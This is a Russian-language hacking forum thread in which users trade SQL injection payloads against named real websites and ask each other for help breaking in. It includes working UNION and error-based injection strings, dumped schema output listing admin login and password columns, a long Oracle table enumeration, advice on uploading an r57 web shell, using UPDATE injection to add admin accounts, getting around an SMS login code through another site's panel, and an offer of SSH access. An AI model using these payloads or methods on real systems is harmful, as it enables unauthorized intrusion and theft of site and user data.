'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(information_schema.co lumns)where(table_schema!=0x696e666f726d6174696f6e 5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723 e,table_schema,0x2e,table_name,0x3a,column_name))) )x),6)#

Учи синтаксис запросов!

Expl0ited said:

Code:
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(information_schema.co lumns)where(table_schema!=0x696e666f726d6174696f6e 5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723 e,table_schema,0x2e,table_name,0x3a,column_name))) )x),6)#



Каким запросом подобрано кол-во полей допишите, пожалуйста ?

Так не получается :

'order(by(6))#

FlaktW said:
Каким запросом подобрано кол-во полей допишите, пожалуйста
Так не получается :
'order(by(6))#


Логику запроса посмотри, там и без order by легко можно обойтись, а даже если и использовать то конструкция которую ты привел не допустима, на вышеупомянутом сайте идет разделение слов по пробелу и осуществляется поиск по словам, а значит нам нужно составить запрос без пробелов, вариантов много, я предпочел бы order/**/by(NUM)

http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%2 9,1,1%29=1

реально ли такую инъекцию не как слепую крутить?

http://opulent-style.com/view_item.php?id=1%20order%20by%202

Unknown column '2' in 'order clause'

vaddd said:
http://opulent-style.com/view_item.php?id=1+and+substring%28%28SELECT%202%2 9,1,1%29=1
реально ли такую инъекцию не как слепую крутить?
http://opulent-style.com/view_item.php?id=1%20order%20by%202
Unknown column '2' in 'order clause'


SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).

XAMEHA said:
SELECT Вложеный в UPDATE. Этот вариант во много раз удобнее обычной инъекции. Вывести информацию можно через ошибку, а при надобности даже заменить её на свою(Добавить пользователя, редактировать новость).


не могли бы вы показать пример использования?


http://www.opulent-style.com/view_item.php?id=1 order by 1


выполняется UPDATE с ошибкой


http://www.opulent-style.com/view_item.php?id=1 order by 2


выполняется SELECT...

вот пример синтаксиса как можно использовать UPDATE но естественно тебе надо знать какие есть таблици для формирования правельного запроса...


UPDATE `phpclass_category` SET `cat_id` = '5' , `cat_name` = '[твой код]' WHERE cat_id=5 LIMIT 1;


и логично что кавычки не должны фильтроваться и слешироваться. а они там слешируются _http://www.opulent-style.com/view_item.php?id=1%27

залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример

http://pikucha.ru/i5KrG

Cherep said:
залил шелл на форум. Когда уже иду по линку шела, он какбы грузится, но вместо файлов ничего нету. Вот пример
http://pikucha.ru/i5KrG


залей r57 и будешь видеть файлы...или пользуйся консолью для просмотра файлов

winstrool said:
вот пример синтаксиса как можно использовать UPDATE но естественно тебе надо знать какие есть таблици для формирования правельного запроса...
и логично что кавычки не должны фильтроваться и слешироваться. а они там слешируются _http://www.opulent-style.com/view_item.php?id=1%27


Почему обязательно? Можно перевести значения переменных в hex...

А так, можно крутить через error based.

http://www.opulent-style.com/view_item.php?id=1%20or%20(select%20count(*)from(s elect%201%20union%20select%202%20union%20select%20 3)x%20group%20by%20concat(mid((select%20version()) ,1,64),floor(rand(0)*2)))

Expl0ited said:
В чем собственно проблема? Вывод в исходнике:

Code:
www.maykoplat.ru/index.php?id=1'and(1=0)union+select(1),2,(select(@ x)from(select(@x:=0x00),(select(0)from(information _schema.columns)where(table_schema!=0x696e666f726d 6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x ,"\r\n",table_schema,0x2e,table_name,0x3a,column_name)))) x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48--+'1


Code:
vsemayki_ru.admin_stat:id
vsemayki_ru.admin_stat:data
vsemayki_ru.admin_stat:name
vsemayki_ru.admin_user:ID
vsemayki_ru.admin_user:LOGIN
vsemayki_ru.admin_user:PASSWORD
vsemayki_ru.admin_user:NAME
vsemayki_ru.admin_user:EMAIL
vsemayki_ru.admin_user:ACTIVE
vsemayki_ru.admin_user:DATE_LAST
vsemayki_ru.admin_user:ISADMIN
vsemayki_ru.admin_user:IP
vsemayki_ru.admin_user:stage2
vsemayki_ru.admin_user:stage3
vsemayki_ru.admin_user:stage4
vsemayki_ru.admin_user:stage5
vsemayki_ru.admin_user:stage6
vsemayki_ru.admin_user:stage7
vsemayki_ru.admin_user:stage8
vsemayki_ru.admin_user:stage9
vsemayki_ru.admin_user:stage10
vsemayki_ru.admin_user:stage11
vsemayki_ru.admin_user:stage12
vsemayki_ru.admin_user:stage13
vsemayki_ru.admin_user:stage14
vsemayki_ru.admin_user:stage15
vsemayki_ru.admin_user:stage16
vsemayki_ru.admin_user:stage17
vsemayki_ru.admin_user:stage18
vsemayki_ru.admin_user:sklad
vsemayki_ru.admin_user:stage19
vsemayki_ru.admin_user:stages20
vsemayki_ru.admin_user:stages21
vsemayki_ru.admin_user:stages22
vsemayki_ru.admin_user:department
vsemayki_ru.admin_user:phone
vsemayki_ru.admin_user_login:admin_login_id
vsemayki_ru.admin_user_login:parent
vsemayki_ru.admin_user_login:datetime
vsemayki_ru.admin_user_login:ip
vsemayki_ru.admin_user_login:type
vsemayki_ru.admin_user_login:succes
vsemayki_ru.admin_user_parts:ID
vsemayki_ru.admin_user_parts:admin_user
vsemayki_ru.admin_user_parts:module
vsemayki_ru.admin_user_parts:module_key
vsemayki_ru.admin_user_parts:iswrite



спс,всё уже узнал!

Но теперь препятствует ещё одна проблема как захожу в админку ввожу логин и пасс,но ещё требует какойто временный код,всю бд пересмотрел временных кодов там нет!помогите кто нито)))

или можно создать запросом как то нового админа или ещё как?

Faaax said:
спс,всё уже узнал!
Но теперь препятствует ещё одна проблема как захожу в админку ввожу логин и пасс,но ещё требует какойто временный код,всю бд пересмотрел временных кодов там нет!помогите кто нито)))
или можно создать запросом как то нового админа или ещё как?


там временный код через смс пересылается на телефон. Однако, на одном из сайтов на этом сервере есть админка, где код не нужен.

mysql 5.1.57

id=0'+union+select+1,2,3,4,5+--+

Скуля, название таблиц получил, а колонки не выводит.

И

id=0'+union+select+1,2,3,4,5+from+users+--+

Не выводит, как будто таблиц не существует.

В чём может быть проблема?

exmicru said:
mysql 5.1.57
id=0'+union+select+1,2,3,4,5+--+
Скуля, название таблиц получил, а колонки не выводит.
И
id=0'+union+select+1,2,3,4,5+from+users+--+
Не выводит, как будто таблиц не существует.
В чём может быть проблема?


id=0'+union+select+column_name+from+db_name.table_ name--+

exmicru said:
mysql 5.1.57
id=0'+union+select+1,2,3,4,5+--+
Скуля, название таблиц получил, а колонки не выводит.
И
id=0'+union+select+1,2,3,4,5+from+users+--+
Не выводит, как будто таблиц не существует.
В чём может быть проблема?


Сперва узнай в какой базе находится табла. Select table_schema from information_schema.tables where table_name=%table_name%

Помогите раскрутить, пожалуйста

www.ca[G00GLE]ndy.ru/detail.asp?PrId=690+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13+FROM+sys.dual​Могу подарить SSH

fl00der said:
Помогите раскрутить, пожалуйста
www.ca[G00GLE]ndy.ru/detail.asp?PrId=690+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13+FROM+sys.dual
​
Могу подарить SSH


Как-то так:

DB Name: DBGP1

Table found: OL$

Table found: OL$HINTS

Table found: OL$NODES

Table found: SRS$

Table found: MGMT_SNAPSHOT

Table found: MGMT_SNAPSHOT_SQL

Table found: MGMT_BASELINE

Table found: MGMT_BASELINE_SQL

Table found: MGMT_CAPTURE

Table found: MGMT_CAPTURE_SQL

Table found: MGMT_RESPONSE_CONFIG

Table found: MGMT_LATEST

Table found: MGMT_LATEST_SQL

Table found: MGMT_HISTORY

Table found: MGMT_HISTORY_SQL

Table found: MGMT_BSLN_DATASOURCES

Table found: MGMT_BSLN_BASELINES

Table found: MGMT_BSLN_INTERVALS

Table found: MGMT_BSLN_METRICS

Table found: MGMT_BSLN_STATISTICS

Table found: MGMT_BSLN_THRESHOLD_PARMS

Table found: EXF$VERSION

Table found: EXF$PARAMETER

Table found: EXF$DEFIDXPARAM

Table found: EXF$ESETIDXPARAM

Table found: SYS_IOT_OVER_40438

Table found: EXF$PREDATTRMAP

Table found: EXF$VALIDIOPER

Table found: EXF$VALIDPRIVS

Table found: EXF$PLAN_TABLE

Table found: DM$P_MODEL

Table found: DM$P_MODEL_TABLES

Table found: XDB$ROOT_INFO

Table found: XDB$H_INDEX

Table found: XDB$COLUMN_INFO

Table found: XDB$PATH_INDEX_PARAMS

Table found: XDB$NMSPC_ID

Table found: XDB$QNAME_ID

Table found: XDB$PATH_ID

Table found: XDB$CHECKOUTS

Table found: XDB$DXPTAB

Table found: XDB$DXPATH

Table found: MIGR9202STATUS

Table found: SYS_IOT_OVER_42474

Table found: SYS_IOT_OVER_42481

Table found: SYS_IOT_OVER_42488

Table found: SYS_IOT_OVER_42491

Table found: RLM$SCHACTLIST

Table found: SYS_IOT_OVER_42510

Table found: SYS_IOT_OVER_42513

Table found: SYS_IOT_OVER_42516

Table found: SYS_IOT_OVER_42519

Table found: SI_IMAGE_FORMATS_TAB

Table found: SI_FEATURES_TAB

Table found: SI_VALUES_TAB

Table found: ORD_CARTRIDGE_COMPONENTS

Table found: MGMT_NOTIFY_QTABLE

Table found: AQ$_MGMT_NOTIFY_QTABLE_S

Table found: SYS_IOT_OVER_49865

Table found: MGMT_VERSIONS

Table found: MGMT_TABLE_SIZES

Table found: MGMT_INDEX_SIZES

Table found: MGMT_REBUILD_INDEXES

Table found: MGMT_LICENSES

Table found: MGMT_AVAILABILITY

Table found: MGMT_CURRENT_AVAILABILITY

Table found: MGMT_AVAILABILITY_MARKER

Table found: MGMT_MASTER_AGENT

Table found: MGMT_MASTER_CHANGED_CALLBACK

Table found: MGMT_TARGET_BASELINES

Table found: MGMT_TARGET_BASELINES_DATA

Table found: MGMT_METRICS

Table found: MGMT_METRICS_EXT

Table found: MGMT_TARGET_TYPES

Table found: MGMT_TARGETS

Table found: MGMT_TYPE_PROPERTIES

Table found: MGMT_TARGET_PROP_DEFS

Table found: MGMT_TARGET_PROPERTIES

Table found: MGMT_TARGET_AGENT_ASSOC

Table found: SYS_IOT_OVER_49969

Table found: SYS_IOT_OVER_49972

Table found: MGMT_STRING_METRIC_HISTORY

Table found: MGMT_LONG_TEXT

Table found: MGMT_METRICS_COMPOSITE_KEYS

Table found: MGMT_TARGETS_DELETE

Table found: MGMT_TARGET_ADD_CALLBACKS

Table found: MGMT_TARGET_DELETE_CALLBACKS

Table found: MGMT_TARGET_DELETE_EXCEPTIONS

Table found: MGMT_DUPLICATE_TARGETS

Table found: MGMT_CHANGE_AGENT_URL

Table found: MGMT_TARGET_ROLLUP_TIMES

Table found: MGMT_METRIC_ERRORS

Table found: MGMT_CURRENT_METRIC_ERRORS

Table found: MGMT_TARGET_ASSOC

Table found: MGMT_TARGET_ASSOC_INSTANCE

Table found: MGMT_ANNOTATION

Table found: MGMT_METADATA_SETS

Table found: MGMT_CALLBACKS

Table found: MGMT_BCN_TARGET

Table found: MGMT_BCN_AVAIL_DEF

Table found: MGMT_BCN_AVAIL_JOB

Table found: MGMT_BCN_TXN_DEFN

Table found: MGMT_BCN_TXN_HTTP

Table found: MGMT_BCN_TXN_HTTP_PARAM

Table found: MGMT_BCN_TXN_PING

Table found: MGMT_BCN_TARGET_TXN

Table found: MGMT_BCN_TARGET_LOCK

Table found: MGMT_ADMIN_METRIC_THRESHOLDS

Table found: MGMT_BCN_AVAIL_LOG

Table found: MGMT_E2E_SUMMARY

Table found: MGMT_E2E_DETAILS

Table found: MGMT_E2E_SQL

Table found: MGMT_E2E_JDBC

Table found: MGMT_E2E_SQL_STMT

Table found: MGMT_E2E_SQL_CONN

Table found: MGMT_E2E_SUMMARY_1HOUR

Table found: MGMT_E2E_SUMMARY_1DAY

Table found: MGMT_E2E_DETAILS_1HOUR

Table found: MGMT_E2E_DETAILS_1DAY

Table found: MGMT_E2E_SQL_1HOUR

Table found: MGMT_E2E_SQL_1DAY

Table found: MGMT_E2E_JDBC_1HOUR

Table found: MGMT_E2E_JDBC_1DAY

Table found: MGMT_BLACKOUT_SCHEDULE

Table found: MGMT_BLACKOUTS

Table found: MGMT_BLACKOUT_TARGET_DETAILS

Table found: MGMT_BLACKOUT_FLAT_TARGETS

Table found: MGMT_BLACKOUT_REASON

Table found: MGMT_BLACKOUT_HISTORY

Table found: MGMT_BLACKOUT_STATE

Table found: MGMT_BLACKOUT_PROXY_TARGETS

Table found: MGMT_METRIC_COLLECTIONS

Table found: MGMT_METRIC_COLLECTIONS_REP

Table found: MGMT_COLLECTION_PROPERTIES

Table found: MGMT_METRIC_THRESHOLDS

Table found: MGMT_PARAMETERS

Table found: MGMT_OMS_PARAMETERS

Table found: MGMT_CREDENTIALS

Table found: MGMT_CREDENTIAL_TYPES

Table found: MGMT_CREDENTIAL_TYPE_COLUMNS

Table found: MGMT_CREDENTIAL_TYPE_COL_VALS

Table found: MGMT_CREDENTIAL_SETS

Table found: MGMT_CREDENTIAL_SET_COLUMNS

Table found: MGMT_CREDENTIALS2

Table found: MGMT_ARU_CREDENTIALS

Table found: MGMT_VIEW_USER_CREDENTIALS

Table found: MGMT_EMCRYPTO_SEED

Table found: MGMT_UPDATE_OPERATIONS

Table found: MGMT_UPDATE_OPERATIONS_DATA

Table found: MGMT_UPDATE_OPERATIONS_DETAILS

Table found: MGMT_UPDATE_THRESHOLDS_DATA

Table found: MGMT_UPDATE_PROPERTIES_DATA

Table found: MGMT_UPDATE_CREDENTIALS_DATA

Table found: MGMT_ECM_PATCH_CACHE

Table found: MGMT_ECM_ARU_MAP

Table found: MGMT_ECM_SNAPSHOT

Table found: MGMT_ECM_SNAP_COMPONENT_INFO

Table found: MGMT_ECM_GEN_SNAPSHOT

Table found: MGMT_ECM_SNAPSHOT_METADATA

Table found: MGMT_ECM_SNAPSHOT_MD_TABLES

Table found: MGMT_ECM_SNAPSHOT_MD_COLUMNS

Table found: MGMT_ECM_LOADED_FILES

Table found: MGMT_INV_CONTAINER

Table found: MGMT_INV_CONTAINER_PROPERTY

Table found: MGMT_INV_COMPONENT

Table found: MGMT_INV_DEPENDENCY_RULE

Table found: MGMT_INV_PATCHSET

Table found: MGMT_INV_VERSIONED_PATCH

Table found: MGMT_INV_PATCH

Table found: MGMT_INV_COMPONENT_PATCH

Table found: MGMT_INV_PATCH_FIXED_BUG

Table found: MGMT_INV_FILE

Table found: MGMT_INV_PATCHED_FILE

Table found: MGMT_INV_PATCHED_FILE_COMP

Table found: MGMT_TARGET_TYPE_COMPONENT_MAP

Table found: MGMT_ECM_HOST_CONFIGS_TO_DEL

Table found: MGMT_ARU_PRODUCTS

Table found: MGMT_ARU_PLATFORMS

Table found: MGMT_ARU_RELEASES

Table found: MGMT_ARU_LANGUAGES

Table found: MGMT_ARU_FAMILY_PRODUCT_MAP

Table found: MGMT_ARU_PRODUCT_RELEASE_MAP

Table found: MGMT_ARU_OUI_COMPONENTS

Table found: MGMT_BUG_ADVISORY

Table found: MGMT_BUG_ADVISORY_BUG

Table found: MGMT_BUG_AVAILABLE_PATCH

Table found: MGMT_BUG_PATCH_PLATFORM

Table found: MGMT_BUG_PATCH_FIXES_BUG

Table found: MGMT_BUG_FIX_APPLIC_COMP_LIST

Table found: MGMT_BUG_FIX_APPLICABLE_COMP

Table found: MGMT_BUG_ADV_HOME_PATCH

Table found: MGMT_DELTA_IDS

Table found: MGMT_DELTA_ENTRY

Table found: MGMT_DELTA_ENTRY_VALUES

Table found: MGMT_DELTA_ID_VALUES

Table found: MGMT_DELTA_SNAP

Table found: MGMT_HC_SYSTEM_SUMMARY

Table found: MGMT_HC_HARDWARE_MASTER

Table found: MGMT_HC_CPU_DETAILS

Table found: MGMT_HC_IOCARD_DETAILS

Table found: MGMT_HC_NIC_DETAILS

Table found: MGMT_HC_OS_SUMMARY

Table found: MGMT_HC_OS_PROPERTIES

Table found: MGMT_HC_OS_COMPONENTS

Table found: MGMT_HC_FS_MOUNT_DETAILS

Table found: MGMT_HC_VENDOR_SW_SUMMARY

Table found: MGMT_HC_VENDOR_SW_COMPONENTS

Table found: MGMT_ECM_RESOURCES

Table found: MGMT_DELTA_SAVED_COMPARISON

Table found: MGMT_DELTA_COMP_SUMMARIES

Table found: MGMT_DELTA_SUMMARY_ERRORS

Table found: MGMT_DELTA_COMPARISON_DELTAS

Table found: MGMT_DELTA_COMP_KEY_COLS

Table found: MGMT_DELTA_COMP_DELTA_DETAILS

Table found: MGMT_DELTA_COMP_PROPERTIES

Table found: MGMT_POLICY_RULE

Table found: MGMT_POLICY_RULE_DEF_COLUMNS

Table found: MGMT_POLICY_RULE_DEF_PARAMS

Table found: MGMT_POLICY_GROUP

Table found: MGMT_POLICY_PARAMS

Table found: MGMT_POLICY_RULE_CRITERIA

Table found: MGMT_POLICY_TARGET_CRITERIA

Table found: MGMT_POLICY_VIOLATIONS

Table found: MGMT_POLICY_VIOLATION_ROWS

Table found: MGMT_POLICY_VIOLATION_VALUES

Table found: MGMT_POLICY_SNAPSHOT_CRITERIA

Table found: MGMT_POLICY_ERRORS

Table found: MGMT_COMP_RESULT_TO_JOB_MAP

Table found: MGMT_ECM_CSA_SNAPSHOT_INFO

Table found: MGMT_ECM_CSA_GENERAL_INFO

Table found: MGMT_ECM_CSA

Table found: MGMT_ECM_CSA_COOKIES

Table found: MGMT_ECM_CSA_CUSTOM

Table found: MGMT_ECM_HW

Table found: MGMT_ECM_HW_CPU

Table found: MGMT_ECM_HW_IOCARD

Table found: MGMT_ECM_HW_NIC

Table found: MGMT_ECM_OS

Table found: MGMT_ECM_OS_PROPERTY

Table found: MGMT_ECM_OS_COMPONENT

Table found: MGMT_ECM_OS_FILESYSTEM

Table found: MGMT_ECM_OS_REGISTERED_SW

Table found: MGMT_ECM_OS_REGISTERED_SW_COMP

Table found: MGMT_FAILOVER_TABLE

Table found: MGMT_FAILOVER_CALLBACKS

Table found: MGMT_TARGET_MEMBERSHIPS

Table found: MGMT_FLAT_TARGET_MEMBERSHIPS

Table found: MGMT_COMP_TARGET_DEF

Table found: MGMT_JOB_COMMAND

Table found: MGMT_JOB_TYPE_INFO

Table found: MGMT_JOB_SINGLE_TARGET_TYPES

Table found: MGMT_JOB_EXECPLAN

Table found: MGMT_JOB_STEP_PARAMS

Table found: MGMT_JOB_NESTED_JOB_TARGETS

Table found: MGMT_JOB_PARAM_SOURCE

Table found: MGMT_JOB_USER_PARAMS

Table found: MGMT_JOB_SQL_PARAMS

Table found: MGMT_JOB_CRED_PARAMS

Table found: MGMT_JOB_SUBST_PARAMS

Table found: MGMT_JOB_PROP_PARAMS

Table found: MGMT_JOB_VALUE_PARAMS

Table found: MGMT_JOB_SEC_INFO

Table found: MGMT_JOB_LOCK_INFO

Table found: MGMT_JOB_LOCK_TARGETS

Table found: MGMT_JOB_SCHEDULE

Table found: MGMT_JOB

Table found: MGMT_JOB_TARGET

Table found: MGMT_JOB_FLAT_TARGETS

Table found: MGMT_JOB_EXT_TARGETS

Table found: MGMT_JOB_OUTPUT

Table found: MGMT_JOB_LARGE_PARAMS

Table found: MGMT_JOB_EXEC_SUMMARY

Table found: MGMT_JOB_EXEC_EVENT_PARAMS

Table found: MGMT_JOB_EXEC_LOCKS

Table found: MGMT_JOB_PARAMETER

Table found: MGMT_JOB_HISTORY

Table found: MGMT_JOB_EXECUTION

Table found: MGMT_JOB_STEP_COMMAND_LOG

Table found: MGMT_JOB_EMD_STATUS_QUEUE

Table found: MGMT_JOB_PURGE_POLICIES

Table found: MGMT_JOB_PURGE_CRITERIA

Table found: MGMT_JOB_PURGE_TARGETS

Table found: MGMT_JOB_PURGE_VALUES

Table found: MGMT_JOB_EVENT

Table found: MGMT_JOB_TYPE_URI_INFO

Table found: MGMT_JOB_TYPE_DISPLAY_PARAM

Table found: MGMT_JOB_TYPE_DISPLAY_INFO

Table found: MGMT_JOB_STEP_TARGETS

Table found: MGMT_JOB_CALLBACKS

Table found: MGMT_JOB_QUEUES

Table found: MGMT_JOB_BLACKOUT_ASSOC

Table found: MGMT_PERFORMANCE_NAMES

Table found: MGMT_SYSTEM_ERROR_LOG

Table found: MGMT_SYSTEM_PERFORMANCE_LOG

Table found: MGMT_METRIC_DEPENDENCY_DEF

Table found: MGMT_METRIC_DEPENDENCY

Table found: MGMT_METRIC_DEPENDENCY_DETAILS

Table found: MGMT_NOTIFY_EMAIL_GATEWAY

Table found: MGMT_NOTIFY_PROFILES

Table found: MGMT_NOTIFY_DEVICES

Table found: MGMT_NOTIFY_DEVICE_PARAMS

Table found: MGMT_NOTIFY_SCHEDULES

Table found: MGMT_NOTIFY_DEV_SCHEDULES

Table found: MGMT_NOTIFY_RULES

Table found: MGMT_NOTIFY_RULE_CONFIGS

Table found: MGMT_NOTIFY_REQUEUE

Table found: MGMT_NOTIFY_QUEUES

Table found: MGMT_NOTIFICATION_LOG

Table found: MGMT_EMD_PING

Table found: MGMT_USER_TYPE_METRIC_PREFS

Table found: MGMT_USER_FOLDERS

Table found: MGMT_USER_PREFERENCES

Table found: MGMT_PORTLET_PREFERENCE_STORE

Table found: MGMT_PURGE_POLICY

Table found: MGMT_PURGE_POLICY_GROUP

Table found: MGMT_PURGE_POLICY_TARGET_STATE

Table found: MGMT_SEC_INFO

Table found: MGMT_AGENT_SEC_INFO

Table found: EM_IPW_INFO

Table found: MGMT_SEVERITY

Table found: MGMT_CURRENT_SEVERITY

Table found: MGMT_PRIVS

Table found: MGMT_ROLES

Table found: MGMT_FLAT_ROLE_GRANTS

Table found: MGMT_USER_CONTEXT

Table found: MGMT_USER_CALLBACKS

Table found: MGMT_CREATED_USERS

Table found: MGMT_LOGIN_ASSISTANTS

Table found: MGMT_LICENSE_DEFINITIONS

Table found: MGMT_HA_BACKUP

Table found: MGMT_HA_MTTR

Table found: MGMT_DB_DBNINSTANCEINFO_ECM

Table found: MGMT_DB_CONTROLFILES_ECM

Table found: MGMT_DB_REDOLOGS_ECM

Table found: MGMT_DB_ROLLBACK_SEGS_ECM

Table found: MGMT_DB_SGA_ECM

Table found: MGMT_DB_LICENSE_ECM

Table found: MGMT_DB_TABLESPACES_ECM

Table found: MGMT_DB_DATAFILES_ECM

Table found: MGMT_HA_INFO_ECM

Table found: MGMT_HA_INIT_PARAMS_ECM

Table found: MGMT_HA_FILES_ECM

Table found: MGMT_HA_RMAN_CONFIG_ECM

Table found: MGMT_DB_FEATUREUSAGE

Table found: MGMT_SQL_EVALUATION

Table found: MGMT_SQL_BIND_VARS

Table found: MGMT_SQLPROBLEM_FACTORS

Table found: MGMT_PLANPROBLEM_FACTORS

Table found: MGMT_SQL_REUSE

Table found: MGMT_SQL_SUMMARY

Table found: MGMT_SQL_PLAN

Table found: MGMT_SQL_METRIC_HELPER

Table found: MGMT_BACKUP_CONFIGURATION

Table found: MGMT_RCVCAT_CONFIG

Table found: MGMT_RCVCAT_REPOS

Table found: MGMT_DBNET_TNS_ADMINS

Table found: MGMT_DB_LATEST_HDM_FINDINGS

Table found: MGMT_DB_HDM_METRIC_HELPER

Table found: MGMT_SPACE_METRICS

Table found: MGMT_DB_RECUSERSETTINGS_ECM

Table found: MGMT_DB_RECTSSETTINGS_ECM

Table found: MGMT_DB_RECSEGMENTSETTINGS_ECM

Table found: MGMT_DB_INVOBJS_ECM

Table found: MGMT_OB_ADMIN_CLIENT_DB

Table found: MGMT_OB_ADMIN_HOSTS

Table found: MGMT_OSM_DISK_GROUP_ECM

Table found: MGMT_HA_CLS_INTR_CONN

Table found: MGMT_HA_RAC_INTR_CONN

Table found: DEPT

Table found: EMP

Table found: BONUS

Table found: SALGRADE

Table found: TMP_PAOLO

Table found: TACL

Table found: TACTION

Table found: TDICSTORAGE

Table found: TDICTIONARY

Table found: TGROUP

Table found: TNEWS

Table found: TPRESSRELEASE

Table found: TPRODUCT

Table found: TPRODUCTATTR

Table found: TPRODUCTSTORAGE

Table found: TPRODUCTTECH

Table found: TPRODUCTTYPE

Table found: TSCITY

Table found: TSERVICECENTRE

Table found: TSREGION

Table found: TSTATICCONTENT

Table found: TTECHNOLOGY

Table found: TACL

Table found: TACTION

Table found: TDICSTORAGE

Table found: TDICTIONARY

Table found: TGROUP

Table found: TNEWS

Table found: TPRESSRELEASE

Table found: TPRODUCT

Table found: TPRODUCTATTR

Table found: TPRODUCTSTORAGE

Table found: TPRODUCTTECH

Table found: TPRODUCTTYPE

Table found: TSCITY

Table found: TSERVICECENTRE

Table found: TSREGION

Table found: TTECHNOLOGY

Table found: TACL

Table found: TACTION

Table found: TDICSTORAGE

Table found: TDICTIONARY

Table found: TGROUP

Table found: TNEWS

Table found: TPERSON

Table found: TPRESSRELEASE

Table found: TPRODUCT

Table found: TPRODUCTATTR

Table found: TPRODUCTSTORAGE

Table found: TPRODUCTTECH

Table found: TPRODUCTTYPE

Table found: TSCITY

Table found: TSERVICECENTRE

Table found: TSREGION

Table found: TTECHNOLOGY

Table found: TS_STATE

Table found: TPERSON

Table found: HD_ERROR_TYPE

Table found: SOFTWARE

Table found: PC

Table found: PC_WARRANTY

Table found: HD_USERS_BCK_16062011

Table found: TPRTYPE

Table found: TPRMEMBER

Table found: PM_STATE

Table found: PM_TYPE

Table found: PM_POST

Table found: TPRTYPE

Table found: TPRMEMBER

Table found: PM_POST_ATTACHMENTS

Table found: HD_USERS_BCK_02032011

Table found: PM_PROBLEM

Table found: MGMT_DIROBJ_USERS_HOTLIST

Table found: MGMT_DB_INIT_PARAMS_ECM

Table found: MGMT_LICENSABLE_TARGET_TYPES

Table found: MGMT_USER_JOBS

Table found: MGMT_USER_TARGETS

Table found: MGMT_PRIV_GRANTS

Table found: MGMT_ROLE_GRANTS

Table found: MGMT_PRIV_INCLUDES

Table found: MGMT_LAST_VIOLATION

Table found: MGMT_NOTIFY_NOTIFYEES

Table found: ESM_COLLECTION

Table found: MGMT_COLLECTION_CREDENTIALS

Table found: MGMT_JOB_CREDENTIALS

Table found: MGMT_CONTAINER_CREDENTIALS

Table found: MGMT_ENTERPRISE_CREDENTIALS

Table found: MGMT_HOST_CREDENTIALS

Table found: MGMT_TARGET_CREDENTIALS

Table found: MGMT_CREDENTIAL_TYPE_REF

Table found: MGMT_BLACKOUT_WINDOWS

Table found: MGMT_METRICS_1DAY

Table found: MGMT_METRICS_1HOUR

Table found: MGMT_CURRENT_METRICS

Table found: MGMT_METRICS_RAW

Table found: AQ$_MGMT_NOTIFY_QTABLE_I

Table found: AQ$_MGMT_NOTIFY_QTABLE_G

Table found: AQ$_MGMT_NOTIFY_QTABLE_H

Table found: AQ$_MGMT_NOTIFY_QTABLE_T

Table found: RLM4J$ATTRALIASES

Table found: RLM4J$RULESET

Table found: RLM4J$EVTSTRUCTS

Table found: RLM$JOBQUEUE

Table found: RLM$SCHACTERRS

Table found: RLM$INCRRRSCHACT

Table found: RLM$PARSEDCOND

Table found: RLM$DMLEVTTRIGS

Table found: RLM$ORDERCLSALS

Table found: RLM$EQUALSPEC

Table found: RLM$PRIMEVTTYPEMAP

Table found: RLM$RSPRIMEVENTS

Table found: RLM$RULESETPRIVS

Table found: RLM$RULESET

Table found: RLM$EVENTSTRUCT

Table found: EXF$EXPSETSTATS

Table found: EXF$IDXSECOBJ

Table found: EXF$ASUDFLIST

Table found: EXF$ATTRLIST

Table found: EXF$EXPSETPRIVS

Table found: EXF$EXPRSET

Table found: EXF$ATTRSET

Table found: EXF$JAVAMSG

Table found: MGMT_DB_SIZE_GTT

Table found: MGMT_DB_FILE_GTT

Table found: MGMT_BSLN_RAWDATA

Table found: MGMT_TEMPT_SQL

Table found: TS_VMO

Table found: TS_TIME_VMO

Table found: MIGR_TS_ACTIVITY

Table found: MIGR_TS_USERS

Table found: TS_BOOKING_USER

Table found: TS_PROJECTS

Table found: HD_CENTRALLY_MANAGE

Table found: HD_STATE

Table found: HD_APPLICATION

Table found: HD_PRIORITY

Table found: TS_HUMANRESOURCES_MAIL

Table found: HD_MONITOR_SR

Table found: HD_DIPARTIMENTO

Table found: TS_TYPE_VMO

Table found: HD_USERS

Table found: HD_WORKFLOW_TYPE

Table found: TS_APPROVAL

Table found: HD_CONNECT

Table found: HD_WORKFLOW

Table found: MGMT_ADMIN_LICENSES

Table found: HD_SOFTWARE

Table found: TS_TIMESHEET

Table found: LOGGED_USER

Table found: HD_REQUEST_TYPE

Table found: HD_IMPACT

Table found: TS_TIMESHEET_SENT

Table found: TS_TIMESHEET_APPROVED

Table found: HD_FCA

Table found: TS_TIMESHEET_COMPLETED

Table found: TS_ACTIVITY

Table found: HD_PC

Table found: HD_GROUP

Table found: TS_PROJECT_ATTACHMENTS

Table found: TS_ACTIVITY_ATTACHMENTS

Table found: MIGR_TS_PROJECT

Table found: TS_ACTIVITY_LOG

Table found: HD_SERVICE_REQUEST

Table found: BACKUP_TS_TIMESHEET

Table found: HD_ATTACH

Table found: RLM$VALIDPRIVS

Table found: RLM$RULESETSTCODE

Table found: RLM$ERRCODE

FlaktW said:
Как-то так:
DB Name: DBGP1
Table found: OL$
Table found: OL$HINTS
...


И теперь главное, расскажи как ты это получил, пожалуйста.

fl00der said:
И теперь главное, расскажи как ты это получил, пожалуйста.


Он использовал havij

Всем привет, помогите плыз разкрутить скулю,

http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729

я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?

qaz said:
Всем привет, помогите плыз разкрутить скулю,
http://plusicq.ru/shop/buycard.php?region=ru'&uin=9139729
я прост немного немогу понять значения запроса в БД, там ваще есть смысл штото проовать?


